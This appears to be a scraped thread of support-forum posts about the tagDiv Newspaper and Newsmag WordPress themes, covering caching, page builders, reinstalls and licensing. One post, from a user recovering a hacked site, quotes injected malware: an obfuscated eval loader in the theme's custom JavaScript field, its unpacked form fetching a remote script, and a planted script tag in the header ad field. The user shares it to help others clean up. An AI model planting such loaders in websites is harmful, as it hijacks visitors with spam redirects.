Hi,

The manual activation is present on Newsmag as well as Newspaper
https://www.screencast.com/t/www7y3WwJ
If this option is not present for you, try deactivating all plugins except theme plugins, clear any installed cache and check again.
Or maybe the theme did not install properly. You could try a fresh theme install by FTP
https://forum.tagdiv.com/newsmag-install-via-ftp/
Please let us know what the results are.

Thanks

Hello,
Yes, your demo install should still be good but you should only use 1 page builder. When switching page builders it is recommended to also re-create the pages using the builder you decide to use.
Thanks.

Hello,

We know of 3 possible causes for this issue.
1) The wp super cache setting to cache page. Please only use these settings in wp super cache: https://forum.tagdiv.com/cache-plugin-install-and-configure/
If you use any other cache plugin, make sure you do not cache pages for known users or for logged in users depending on the plugin setting.

2) Do not use this setting in seo by yoast: https://www.screencast.com/t/n8Cc35EofLh

3) Editing a page that was previously built with another page builder.
You need to edit the page with the builder it was initially created with.

Thank you!

Im sorry Im very new at this, but won’t it cause a issue if I delete a active theme and then install a new one? Plugins and themes I usually just get a message to update in wp-admin and I do so. This is slightly new to me.

Hi,

The Header and footer will be the same ones for the whole website. There is no option to have different headers for example, on particular pages. That could only be achieved with conditionals in the theme files, but that could prove difficult to do.
Pages can be created in any way you like. Maybe what you want is a multisite
https://codex.wordpress.org/Create_A_Network
http://www.wpbeginner.com/wp-tutorials/how-to-install-and-setup-wordpress-multisite-network
Or maybe a shop page set with Woocommerce plugin
https://docs.woocommerce.com/documentation/plugins/woocommerce/

Thanks

Hello masdi,

Make sure that your theme was right installed via FTP way according to our documentation here -> https://forum.tagdiv.com/install-via-ftp/ I recommend you to make a new fresh install, clear all your caches, purge CND files and check the results. Also, check the system status parameters to be according to our documentation here -> https://forum.tagdiv.com/system-status-parameters-guide/

Thanks for your understanding!

Hi,

Please send us an email at contact@tagdiv.com and provide admin login information so we can take a look. We may need to deactivate your plugins for testing purposes. Also paste a link to this topic in your email.
Alternatively you could try a fresh theme install if possible by FTP
https://forum.tagdiv.com/install-via-ftp/
And make some tests only having theme plugins active.

Thanks

Hi I am experiencing the same problem, my website was hacked and I have managed to clean the wordpress installation but not the theme.Redirect problem occurs only when Newsmag is activated, if any other theme is activated this problem stops, and I tried different versions of Newsmag they all are effected, i.e. they all redirect to spam links, so updating/downgrading the theme doesn’t help. I don’t know what else to try, do you have any suggestion?

Which theme version, specifically?

And, did you uninstall any old versions of the theme you might have used in past from TagDiv?

Also which version of WordPress?

I am trying to upgrade from an old version 4.2 installation, however, after deleting the old theme and uploading and activating the new version, the link to perform the conversion is missing and the old theme settings are missing. What can I do?

Thanks for the help. I found a hidden caching plugin that I believe was the culprit under wp-content/mu-plugins/… which must have been installed by previous host. Thanks for the help and when the builder works, it works great.

Hi, within my website, I’d like to do a completely different look. I want it to almost look like two different websites, but within the same domain. Is this possible to do without installing a separate WordPress installation with a separate database?

so, lets say I have http://www.newspaper.com – which is a newspaper/media website. Now I want to sell professional grade news, http://www.newspaper.com/professional – with a landing page that is about selling our products, not news stories.

Thank you

I am installing a revolution slider. When I am attempting to attach it to a category I don’t see any listed under the Posts block for me to choose from.

The Envato policy allows to use a theme only on one install. You can however use the theme on a sub-domain if you plan on creating a testing site, but if we are talking about totally different sites with different content, then only one theme per install is legally allowed.

I am going to create a child theme and install the GTM snippet in the header.php. My question is, I noticed two header.php files in the Newspaper theme:

1. header.php
2. mobile/header.php

To ensure that the GTM snippet is globally placed site-wide for all devices (Mobile/Tablet/Desktop…) do I need to place the GTM snippet in both header.php files?

I had disabled all plugins per suggestions on forum and updated newspaper 8 theme and it’s plugins. The Mobile Theme was previously working when I first installed it but now it doesn’t work completely. Jetpack mobile theme has always been disabled, don’t use Yoast.

Hi,

Chris and mhendiz thanks for your advice, I’ve had already done all of your suggestions.
Finally I think I’ve resolved the issue. Here’s my thoughts:

Just before the beginning of my clean-up procedure the malware moved the script to
WP Admin > Newspaper > Theme panel > Custom Code > Custom Javascript

I found the following JS in this field:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))

If you unpack the above, you’ll get:

var script = document.createElement('script');
script.src = 'https://js.trysomethingnew.eu/analytics.js';
document.getElementsByTagName('head')[0].appendChild(script);

So that’s why I couldn’t find the infection in the db.

The first stage of the infection included the following in the WP Admin > Newspaper > Theme panel > Header Ad:

<script src='https://blue.traffictrade.life/main.js' type='text/javascript'></script>

I hope now that I’ve installed fresh copies of WP, theme and plugins the issue will be resolved.

You can also check this post, if you encounter the same issue with old versions of Newspaper theme: https://productforums.google.com/forum/#!topic/webmasters/u5mYsV6gVdg

Hello,

All the values I like are corrections, and have not changed since we installed the theme.

I can check the following errors in “Console”:

Failed to load resource: net :: ERR_CONNECTION_TIMED_OUT
/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.0 The resource could not be loaded: the server responded with a status of 403 (Forbidden)

What can i Do?

I see this in WordPress too:

Warning: You are currently using obsolete PHP event tracking events for which we will remove support in an upcoming release. We recommend switching to JS event tracking because it is significantly more accurate than tracking events based on PHP. To change, click here. Users who do not change manually will be automatically changed in an upcoming release.

Thank you!
